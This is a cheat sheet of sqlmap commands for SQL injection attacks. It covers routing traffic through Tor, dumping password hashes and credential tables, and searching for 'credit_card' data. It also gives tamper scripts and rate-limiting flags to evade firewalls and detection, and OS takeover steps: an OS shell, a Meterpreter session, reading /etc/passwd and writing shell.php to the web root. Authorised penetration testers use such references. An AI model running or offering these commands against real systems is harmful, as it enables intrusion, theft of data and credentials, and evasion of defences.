SQLMap Advanced Cheat Sheet

1. Authentication & Anonymity

Essential flags for connecting to secured targets or remaining hidden.

Request Files (The “Pro” Way)

Instead of typing long URLs, save the raw HTTP request from Burp Suite to a file (e.g., req.txt).

sqlmap -r req.txt –batch

Proxy & Tor (OpSec)

Flag	Description
`--tor`	Route traffic through default Tor network
`--check-tor`	Verify Tor IP is being used properly
`--proxy="http://127.0.0.1:8080"`	Route through Burp Suite or Proxy
`--random-agent`	Use random User-Agent (Avoids default block)
`--mobile`	Imitate a smartphone User-Agent

Authentication

sqlmap -u “http://target.com” –auth-type=Basic –auth-cred=”user:pass”

sqlmap -u “http://target.com” –cookie=”PHPSESSID=a8d7s9…”

2. Database Enumeration

Mapping out the database structure before dumping data.

Basic Recon

--banner: Get version info
--current-user: Who are we?
--current-db: Where are we?
--is-dba: Do we have Admin rights?

Structure Mapping

--dbs: List all Databases
--tables: List Tables in DB
--columns: List Columns in Table
--schema: List DBMS schema

Deep Dive

--users: List all DB users
--passwords: Dump password hashes
--privileges: List user privileges
--roles: List user roles

3. Data Extraction

Targeted Dumping

Don’t dump the whole database! Be surgical to avoid detection.

sqlmap -u [URL] -D users_db -T accounts -C “username,password,email” –dump

Search for Specific Data

Great for finding tables containing “admin” or “credit_card” without listing everything.

sqlmap -r req.txt –search -C “password”

sqlmap -r req.txt –search -T “admin”

Filtering Dumps

sqlmap -u [URL] –dump -T users –where=”id>50″ –start=1 –stop=10

4. WAF Bypass (Tamper Scripts)

Use tamper scripts to obfuscate payloads and bypass Web Application Firewalls.

Common Tamper Combinations

Target	Suggested Command
General / Unknown	`--tamper=between,randomcase,space2comment`
MSSQL	`--tamper=between,charencode,charunicodeencode`
MySQL	`--tamper=between,bluecoat,sp_password`

Other Bypass Flags

--hpp: HTTP Parameter Pollution (splits payload across variables).
--delay=2: Slow down requests to avoid rate limiting.
--csrf-token="mytoken": Automatically handle anti-CSRF tokens.

5. OS Takeover Dangerous

Requires DBA privileges. These commands write files to the server.

OS Shell

Get a command prompt on the server (via xp_cmdshell, or file upload).

sqlmap -u [URL] –os-shell

Metasploit Integration (OS Pwn)

Spawns a Meterpreter session automatically.

sqlmap -u [URL] –os-pwn –msf-path=/usr/share/metasploit-framework/

File System Access

sqlmap -u [URL] –file-read=”/etc/passwd”

sqlmap -u [URL] –file-write=”shell.php” –file-dest=”/var/www/html/shell.php”

6. Advanced Injection Points

Custom Injection Point (*)

If SQLMap can’t find the parameter, or you want to inject into a URI or JSON, use the asterisk *.

URI Injection:

sqlmap -u “http://target.com/user/1*/profile”

JSON Injection (in -r file):

{“id”: “1*”, “name”: “test”}

Force Technology

Save time if you already know the backend.

sqlmap -u [URL] –dbms=mysql

sqlmap -u [URL] –os=linux

7. Performance & Optimization

Flag	Function
`--threads=10`	Increase concurrent requests (Default: 1)
`--null-connection`	Get page length without body (saves bandwidth)
`--keep-alive`	Use persistent HTTP connections
`--predict-output`	Predict common queries (Stats tables, etc.)
`-v 3`	Show the actual payloads being sent